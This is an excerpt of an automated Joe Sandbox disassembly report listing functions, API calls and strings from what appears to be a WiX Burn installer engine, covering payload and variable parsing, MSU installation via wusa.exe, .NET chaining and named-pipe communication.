download, xrefs: 0099CEE5
FilePath, xrefs: 0099CEAB
Failed to get @Id., xrefs: 0099D221
embedded, xrefs: 0099CF05
Failed to get @Catalog., xrefs: 0099D1D5
LayoutOnly, xrefs: 0099CF8D
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0099D1B2
Failed to get @LayoutOnly., xrefs: 0099D197
FileSize, xrefs: 0099D002
Failed to get @Container., xrefs: 0099D18D
Failed to parse @FileSize., xrefs: 0099D1A1
Failed to allocate memory for payload structs., xrefs: 0099CE49
Catalog, xrefs: 0099D0EC
Failed to get @CertificateRootThumbprint., xrefs: 0099D1C7
Failed to select payload nodes., xrefs: 0099CDEB
Failed to find catalog., xrefs: 0099D1CE
DownloadUrl, xrefs: 0099CFD9
Container, xrefs: 0099CF4B
Hash, xrefs: 0099D0B7
Failed to get @Hash., xrefs: 0099D1E3
Payload, xrefs: 0099CDD8
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0099D1B9
Failed to get @SourcePath., xrefs: 0099D1F1
Failed to get @FilePath., xrefs: 0099D21A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
API String ID: 1171520630-3127305756
Opcode ID: 7dc3677a548deaf19aa57075d4f8167090d6f76a23d1601c4064f767f65b4325
Instruction ID: fa5ade61612e352750b031ff2bb584047215724373e57dfeef4b22b6158a185e
Opcode Fuzzy Hash: 7dc3677a548deaf19aa57075d4f8167090d6f76a23d1601c4064f767f65b4325
Instruction Fuzzy Hash: C5C10872D86629FBCF259B98CC92F6D7768EF44720F108166FA12B7290D774EE009790

Function 00998476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00995445,?,00000000,80070490,?,?,?,?,?,?,?,?,009BC1BF,?,00995445,?), ref: 009984A7
LeaveCriticalSection.KERNEL32(00995445,?,?,?,?,?,?,?,?,009BC1BF,?,00995445,?,00995445,00995445,Chain), ref: 00998804

Strings

Type, xrefs: 009985A3
Failed to get @Type., xrefs: 00998788
Failed to get @Persisted., xrefs: 009987E1
Initializing version variable '%ls' to value '%ls', xrefs: 00998653
Hidden, xrefs: 0099852F
Failed to get next node., xrefs: 009987F6
Failed to set value of variable: %ls, xrefs: 009987A7
Failed to set variant encryption, xrefs: 0099879D
Failed to get @Hidden., xrefs: 009987E8
Value, xrefs: 00998565
Failed to set variant value., xrefs: 0099878F
Persisted, xrefs: 0099854A
Initializing string variable '%ls' to value '%ls', xrefs: 0099861A
variable.cpp, xrefs: 009987B9
Attempt to set built-in variable value: %ls, xrefs: 009987C8
string, xrefs: 009985F7
Failed to get variable node count., xrefs: 009984E1
version, xrefs: 0099862C
Failed to select variable nodes., xrefs: 009984C4
Initializing numeric variable '%ls' to value '%ls', xrefs: 009985E2
Failed to get @Id., xrefs: 009987EF
Failed to get @Value., xrefs: 00998796
numeric, xrefs: 009985BC
Initializing hidden variable '%ls', xrefs: 00998671
Invalid value for @Type: %ls, xrefs: 00998778
Failed to insert variable '%ls'., xrefs: 009986C6
Failed to change variant type., xrefs: 009987DA
Variable, xrefs: 009984B1
Failed to find variable value '%ls'., xrefs: 009987D2

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1614826165
Opcode ID: b6f728c61c93461515e2aa5d1b6ca6250da8e245d40dd2cf5e00e6d3d0c28284
Instruction ID: a3174e6acb36da6a6f81c26fc3a98cd5abbe72c9d4425c30f2b1dedaa89e9023
Opcode Fuzzy Hash: b6f728c61c93461515e2aa5d1b6ca6250da8e245d40dd2cf5e00e6d3d0c28284
Instruction Fuzzy Hash: 6EB1E572D8021AFBCF11DBD8CC41EAFBB79AF85710F20865AF514B6290CB759A40DB90

Function 009B6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,009ABDDC,00000007,?,?,?), ref: 009B6D20

Part of subcall function 009D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00995EB2,00000000), ref: 009D0AE0
Part of subcall function 009D0ACC: GetProcAddress.KERNEL32(00000000), ref: 009D0AE7
Part of subcall function 009D0ACC: GetLastError.KERNEL32(?,?,?,00995EB2,00000000), ref: 009D0AFE

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 009B710F
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 009B7123

Strings

Failed to append log switch to MSU command-line., xrefs: 009B6EB6
Failed to determine WOW64 status., xrefs: 009B6D32
Failed to format MSU install command., xrefs: 009B6E5C
Failed to find System32 directory., xrefs: 009B6D95
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 009B6E75
WixBundleExecutePackageCacheFolder, xrefs: 009B6E0B, 009B713B
wusa.exe, xrefs: 009B6DA0
Failed to CreateProcess on path: %ls, xrefs: 009B6F9A
Failed to find Windows directory., xrefs: 009B6D5F
Failed to get cached path for package: %ls, xrefs: 009B6DFC
Failed to append SysNative directory., xrefs: 009B6D7D
Failed to wait for executable to complete: %ls, xrefs: 009B709E
Bootstrapper application aborted during MSU progress., xrefs: 009B7054
/log:, xrefs: 009B6EA2
Failed to ensure WU service was enabled to install MSU package., xrefs: 009B6F2E
Failed to get action arguments for MSU package., xrefs: 009B6DD6
SysNative\, xrefs: 009B6D6A
Failed to build MSU path., xrefs: 009B6E35
Failed to format MSU uninstall command., xrefs: 009B6E89
msuengine.cpp, xrefs: 009B6F8D, 009B7022, 009B704A
Failed to append log path to MSU command-line., xrefs: 009B6ED4
D, xrefs: 009B6F3B
2, xrefs: 009B6FB3
"%ls" "%ls" /quiet /norestart, xrefs: 009B6E48
Failed to allocate WUSA.exe path., xrefs: 009B6DB3
Failed to get process exit code., xrefs: 009B702C

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: 25e5cf42ebc326a3c4173843f2896d57c5bf9cf8663554413b95280174409c8c
Instruction ID: 71b3eedc456696c2134b9bc6c50ec9cb44d67e9d707a30322cd0696eb865d686
Opcode Fuzzy Hash: 25e5cf42ebc326a3c4173843f2896d57c5bf9cf8663554413b95280174409c8c
Instruction Fuzzy Hash: 5BD1D370A4030AFBDF119FE5CE85FEEBBB8AF84714F104526F600A6191D7B9AD409B50

Function 009D744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 009D755D
SysFreeString.OLEAUT32(00000000), ref: 009D7726
SysFreeString.OLEAUT32(00000000), ref: 009D77C3

Strings

author, xrefs: 009D749B, 009D762C
link, xrefs: 009D74F2, 009D76D4
logo, xrefs: 009D75B0
icon, xrefs: 009D7574
subtitle, xrefs: 009D75CC
atomutil.cpp, xrefs: 009D7477, 009D77AD
updated, xrefs: 009D7604
title, xrefs: 009D75E8
category, xrefs: 009D74B8, 009D7665
`5w, xrefs: 009D7726, 009D77C3
entry, xrefs: 009D74D5, 009D769E
(, xrefs: 009D7701
generator, xrefs: 009D7550
@, xrefs: 009D76CC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$`5w$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-3316252067
Opcode ID: 7b9b3536e29ed3b919ef0e44519e6435170210e89bf215314d85b52a3181383e
Instruction ID: 40c22ceb95b84322886722862c997ecac8edefbc7f5b3c094351385433fe6f62
Opcode Fuzzy Hash: 7b9b3536e29ed3b919ef0e44519e6435170210e89bf215314d85b52a3181383e
Instruction Fuzzy Hash: E3B15F3198922ABBDB119BE4CC41F6EB678AB04724F208756F521A73D1E770EA50DB90

Function 009D710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,009F3E78,000000FF,?,?,?), ref: 009D71D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 009D71F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009D7219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 009D7235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 009D725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 009D7279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 009D72B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 009D72EB

Part of subcall function 009D6D50: SysFreeString.OLEAUT32(00000000), ref: 009D6E89
Part of subcall function 009D6D50: SysFreeString.OLEAUT32(00000000), ref: 009D6EC8

SysFreeString.OLEAUT32(00000000), ref: 009D736F
SysFreeString.OLEAUT32(00000000), ref: 009D741F

Strings

author, xrefs: 009D7138, 009D726B
cabinet.dll, xrefs: 009D7150
link, xrefs: 009D7172, 009D731D
published, xrefs: 009D7227
version.dll, xrefs: 009D7133
atomutil.cpp, xrefs: 009D740C
updated, xrefs: 009D724F
(, xrefs: 009D734A
summary, xrefs: 009D71EB
feclient.dll, xrefs: 009D7206
content, xrefs: 009D72DD
msi.dll, xrefs: 009D7137
title, xrefs: 009D720B
category, xrefs: 009D7155, 009D72A4
`5w, xrefs: 009D736F, 009D741F
clbcatq.dll, xrefs: 009D7242

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($`5w$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-2423559989
Opcode ID: c1021fdfc2363896bd206d32f92aa28f5f4eb59b9e1e6f4968f16c36d692c82a
Instruction ID: 7bf53abcca979ed630a5b144e05469860a573e0c2673a0231ae307710387420c
Opcode Fuzzy Hash: c1021fdfc2363896bd206d32f92aa28f5f4eb59b9e1e6f4968f16c36d692c82a
Instruction Fuzzy Hash: A7A1733198821ABBDB119BD4CC41F6DFB79AB04730F208756FA21A63D1E770EA50D791

Function 009BD43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 009BD4B3
StringFromGUID2.OLE32(?,?,00000027), ref: 009BD4DC
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 009BD5C5
GetLastError.KERNEL32(?,?,?,?), ref: 009BD5CF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 009BD668
WaitForSingleObject.KERNEL32(009DB500,000000FF,?,?,?,?), ref: 009BD673
ReleaseMutex.KERNEL32(009DB500,?,?,?,?), ref: 009BD69D
GetExitCodeProcess.KERNEL32(?,?), ref: 009BD6BE
GetLastError.KERNEL32(?,?,?,?), ref: 009BD6CC
GetLastError.KERNEL32(?,?,?,?), ref: 009BD704

Part of subcall function 009BD33E: WaitForSingleObject.KERNEL32(?,000000FF,755730B0,00000000,?,?,?,?,009BD642,?), ref: 009BD357
Part of subcall function 009BD33E: ReleaseMutex.KERNEL32(?,?,?,?,009BD642,?), ref: 009BD375
Part of subcall function 009BD33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BD3B6
Part of subcall function 009BD33E: ReleaseMutex.KERNEL32(?), ref: 009BD3CD
Part of subcall function 009BD33E: SetEvent.KERNEL32(?), ref: 009BD3D6

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 009BD7B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 009BD7D1

Strings

Failed to allocate netfx chainer arguments., xrefs: 009BD593
Failed to create netfx chainer., xrefs: 009BD55E
%ls /pipe %ls, xrefs: 009BD57F
Failed to wait for netfx chainer process to complete, xrefs: 009BD732
D, xrefs: 009BD5AA
Failed to CreateProcess on path: %ls, xrefs: 009BD5FE
NetFxChainer.cpp, xrefs: 009BD4F1, 009BD5F3, 009BD6F0, 009BD728
Failed to get netfx return code., xrefs: 009BD6FA
Failed to allocate event name., xrefs: 009BD53F
NetFxSection.%ls, xrefs: 009BD509
NetFxEvent.%ls, xrefs: 009BD52B
Failed to create netfx chainer guid., xrefs: 009BD4C0
Failed to process netfx chainer message., xrefs: 009BD648
Failed to allocate section name., xrefs: 009BD51D
Failed to convert netfx chainer guid into string., xrefs: 009BD4FB

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 1533322865-1825855094
Opcode ID: 2841d42715171fd6b9910e97541d7141bd19e4abec064b7d165403036c400b44
Instruction ID: 36acf9f02efc3e81daa673448219cb6441a9412731299cbdff8f80888e75795d
Opcode Fuzzy Hash: 2841d42715171fd6b9910e97541d7141bd19e4abec064b7d165403036c400b44
Instruction Fuzzy Hash: B1A18D72D42229EBDF219FA4CD85BEEB7B8AB44720F114165FA08F7252E7349D408F91

Function 009A54DC Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 229filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,009DB500,?,00000000,?,0099452F,?,009DB500), ref: 009A54FD
GetCurrentProcessId.KERNEL32(?,0099452F,?,009DB500), ref: 009A5508
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0099452F,?,009DB500), ref: 009A553F
ConnectNamedPipe.KERNEL32(?,00000000,?,0099452F,?,009DB500), ref: 009A5554
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A555E
Sleep.KERNEL32(00000064,?,0099452F,?,009DB500), ref: 009A5593
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55B6
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55D1
WriteFile.KERNEL32(?,0099452F,009DB500,00000000,00000000,?,0099452F,?,009DB500), ref: 009A55EC
WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0099452F,?,009DB500), ref: 009A5607
ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0099452F,?,009DB500), ref: 009A5622
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A567D
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A56B1
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A56E5
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A5719
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A574A
GetLastError.KERNEL32(?,0099452F,?,009DB500), ref: 009A577B

Strings

pipe.cpp, xrefs: 009A5669, 009A569D, 009A56D1, 009A5705, 009A5739, 009A576A, 009A579B
Failed to set pipe to non-blocking., xrefs: 009A57A5
crypt32.dll, xrefs: 009A55CF
Failed to wait for child to connect to pipe., xrefs: 009A5673
Failed to write secret to pipe., xrefs: 009A570F
Failed to write our process id to pipe., xrefs: 009A56DB
Failed to write secret length to pipe., xrefs: 009A5743
Failed to read ACK from pipe., xrefs: 009A56A7
Failed to reset pipe to blocking., xrefs: 009A5774

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
API String ID: 2944378912-2047837012
Opcode ID: 57ea7ff1eca53e1376f3501d99e451bc4b5941c58b2706ecba7f8c51d6336afb
Instruction ID: 1f2514d4c4a5b6552a83514f4902c00db4cc42717fc93b5773c1729808d4a98c
Opcode Fuzzy Hash: 57ea7ff1eca53e1376f3501d99e451bc4b5941c58b2706ecba7f8c51d6336afb
Instruction Fuzzy Hash: F971D777F81635EBDB209BA68C49BAE76ACAF05B50F134525BE00FB180E7748D4086E0

Function 0099A416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099A45A
_MREFOpen@16.MSPDB140-MSVCRT ref: 0099A480
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0099A768

Strings

Failed to query registry key value., xrefs: 0099A5DA
Failed to get expand environment string., xrefs: 0099A6DD
Failed to read registry value., xrefs: 0099A6F6
Failed to format key string., xrefs: 0099A465
Failed to open registry key., xrefs: 0099A4ED
Failed to change value type., xrefs: 0099A70F
Failed to format value string., xrefs: 0099A48B
Failed to allocate string buffer., xrefs: 0099A667
Failed to clear variable., xrefs: 0099A4D8
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0099A740
Registry key not found. Key = '%ls', xrefs: 0099A4B4
search.cpp, xrefs: 0099A54A, 0099A57D, 0099A5D0, 0099A6D3
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0099A51C
Failed to query registry key value size., xrefs: 0099A554
Unsupported registry key value type. Type = '%u', xrefs: 0099A608
Failed to allocate memory registry value., xrefs: 0099A587
Failed to set variable., xrefs: 0099A72B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: 610939787062f9d95af76f6ffe6c218e2d4c0b3cd29cece03a9369bffeae1e9e
Instruction ID: 5d19bd7060af5e576caafd6c9502b5eb504188cfcc4ad02bb28893ec1678d19a
Opcode Fuzzy Hash: 610939787062f9d95af76f6ffe6c218e2d4c0b3cd29cece03a9369bffeae1e9e
Instruction Fuzzy Hash: 7CA1C772D41229BBCF11AAECCC46BAEBB78EF44710F15C512F914BA250D7759E009BE2

Function 00995770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0099A8B4,00000100,000002C0,000002C0,00000100), ref: 00995795
lstrlenW.KERNEL32(000002C0,?,0099A8B4,00000100,000002C0,000002C0,00000100), ref: 0099579F
_wcschr.LIBVCRUNTIME ref: 009959A7
LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0099A8B4,00000100,000002C0,000002C0,00000100), ref: 00995C4A

Strings

Failed to allocate variable array., xrefs: 00995A85
[%d], xrefs: 00995962
Failed to allocate string., xrefs: 00995BC1
Failed to set record string., xrefs: 00995B60
Failed to get variable name., xrefs: 00995A8C
Failed to reallocate variable array., xrefs: 00995A2C
Failed to get formatted length., xrefs: 00995B92
Failed to format record., xrefs: 00995C0E
Failed to allocate buffer for format string., xrefs: 009957BD
Failed to format placeholder string., xrefs: 00995A57
Failed to copy string., xrefs: 00995C2E
*****, xrefs: 00995913
Failed to append string., xrefs: 0099581B
Failed to allocate record., xrefs: 00995A0B
Failed to set variable value., xrefs: 00995A61
variable.cpp, xrefs: 009959FE, 00995A1F, 00995A78, 00995ACA, 00995B56, 00995B88, 00995C04
Failed to append placeholder., xrefs: 00995A4D
Failed to determine variable visibility: '%ls'., xrefs: 00995A3A
Failed to set record format string., xrefs: 00995AD4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 67e9a5be74c95d1df661d76b83298f09f1fdaa79ddeafe222b9ce921fd9ba0fa
Instruction ID: ef18e5b39958a0caa743d6b4c2b1a4cd7fa51f486b15a9b2ee140207b48fe2b3
Opcode Fuzzy Hash: 67e9a5be74c95d1df661d76b83298f09f1fdaa79ddeafe222b9ce921fd9ba0fa
Instruction Fuzzy Hash: D8F1A971D41619EFDF11DFA98C41EAF7BA8EB44B60F16852AFD04AB240D7349E01CBA0

Function 009BCE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON

Download Yara Rule

APIs

